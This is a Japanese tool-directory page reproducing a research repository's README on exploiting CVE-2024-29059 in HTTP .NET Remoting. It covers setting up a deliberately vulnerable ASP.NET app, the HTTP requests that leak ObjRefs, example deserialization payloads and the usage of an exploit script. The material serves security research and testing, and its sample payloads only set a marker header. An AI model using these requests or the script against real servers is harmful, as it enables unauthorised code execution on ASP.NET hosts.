Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
HttpRemotingObjRefLeak — 追加リソース: HTTP .NET Remotingを介したObjRefsの漏洩・悪用 (CVE-2024-29059) | Kitploit
ツール/GitHubGitHub/codewhitesec/httpremotingobjrefleak
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubcodewhitesec/httpremotingobjrefleak

HttpRemotingObjRefLeak

追加リソース: HTTP .NET Remotingを介したObjRefsの漏洩・悪用 (CVE-2024-29059)

リポジトリを見る
92142年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

HTTP .NET Remoting を介した ObjRef の漏洩と悪用 (CVE-2024-29059)

このリポジトリは、同じタイトルのCODE WHITEブログ記事 Leaking ObjRefs to Exploit HTTP .NET Remoting に関するさらなる詳細とリソースを提供します:

  1. 脆弱なASP.NET Webアプリケーションの作成
  2. ObjRef リークの検出
  3. TypeFilterLevel.Low の制限下で動作するデシリアライゼーションペイロードの例
  4. ペイロードを配信するためのエクスプロイトスクリプト

1. 脆弱なASP.NET Webアプリケーションの作成

以下は、Microsoft による Configure Application Insights for your ASP.NET website に基づいており、Visual Studio 2019(.NET Framework 4.5.2 を対象とするために必要です。https://aka.ms/vs/16/release/vs_community.exe から今でもダウンロードできます)と Microsoft Application Insights を使用して脆弱な ASP.NET Web アプリケーションを作成する方法を説明しています:

  1. Visual Studio 2019 を開きます。
  2. ファイル > 新規 > プロジェクト を選択します。
  3. ASP.NET Web アプリケーション (.NET Framework) C# を選択し、次へ をクリックします。
  4. .NET Framework 4.5.2 を選択し、作成 をクリックします。
  5. 空 を選択し、作成 をクリックします。
  6. プロジェクト > Application Insights テレメトリの追加 を選択します。
  7. Application Insights SDK (ローカル) を選択し、次へ をクリックします。
  8. NuGet パッケージ にチェックを入れ、完了 をクリックします。

2024年1月の .NET Framework 更新プログラムがインストールされている場合は、Web.config ファイルを開き、/configuration/appSettings の下に次の項目を追加して、脆弱な動作を再度有効にします:

root@kitploit:~
<add key="microsoft:Remoting:LateHttpHeaderParsing" value="true" />

その後、デバッグ > デバッグなしで開始 を使用するか、Ctrl+F5 を押して Web アプリケーションを実行できます。

2. ObjRef リークの検出

以下のリクエストを使用して、LogicalCallContext に格納されている MarshalByRefObject インスタンスの ObjRef をリークさせることができます:

  • BinaryServerFormatterSink:

    root@kitploit:~
    GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
    __RequestVerb: POST
    Content-Type: application/octet-stream
    
  • SoapServerFormatterSink:

    root@kitploit:~
    GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
    __RequestVerb: POST
    Content-Type: text/xml
    

リークした ObjRef URI は、次の正規表現を使用してマッチングできます:

root@kitploit:~
/[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem

3. デシリアライゼーションペイロードの例

TypeFilterLevel.Low によって引き起こされる制限下で動作するカスタム XAML ペイロードを使用して、YSoSerial.Net の TextFormattingRunProperties ガジェット に基づいた 2 つの単純なデシリアライゼーションペイロードを作成し、次の操作を実行します:

  • HttpContext.Current.Response.AddHeader("Set-Cookie", "x=ad92afb4-00c3-4479-bab8-2425b5716081")
  • HttpContext.Current.Response.RedirectLocation = "/ad92afb4-00c3-4479-bab8-2425b5716081"

HTTP ヘッダーは、HTTP .NET Remoting リクエストに対するサーバーの応答で確認できます。

4. エクスプロイトスクリプト

RemoteApplicationMetadata.py スクリプトは、既存の ObjRef をリークし、その後のリクエストでそれを使用して指定されたペイロードを配信する方法を提供します:

root@kitploit:~
usage: RemoteApplicationMetadata.py [-h] [-c] [--chunk-range CHUNK_RANGE] [-e] [-f {binary,soap}] [-u] [-v] url [file]

positional arguments:
  url                   target URL (without `RemoteApplicationMetadata.rem`)
  file                  BinaryFormatter/SoapFormatter payload file (default: stdin)

options:
  -h, --help            show this help message and exit
  -c, --chunked         use chunked Transfer-Encoding for request
  --chunk-range CHUNK_RANGE
                        range to pick the chunk size from randomly, e. g., 1-10
  -e, --encoding        apply a random non ASCII-based encoding on SOAP
  -f {binary,soap}, --format {binary,soap}
                        targeted runtime serializer format (default: soap)
  -u, --use-generic-uri
                        use the generic `RemoteApplicationMetadata.rem` also for the payload delivery request
  -v, --verbose         print verbose info

例:

root@kitploit:~
./RemoteApplicationMetadata.py -f binary https://127.0.0.1:44365 AddHeader.bin -u -v
ツールをダウンロード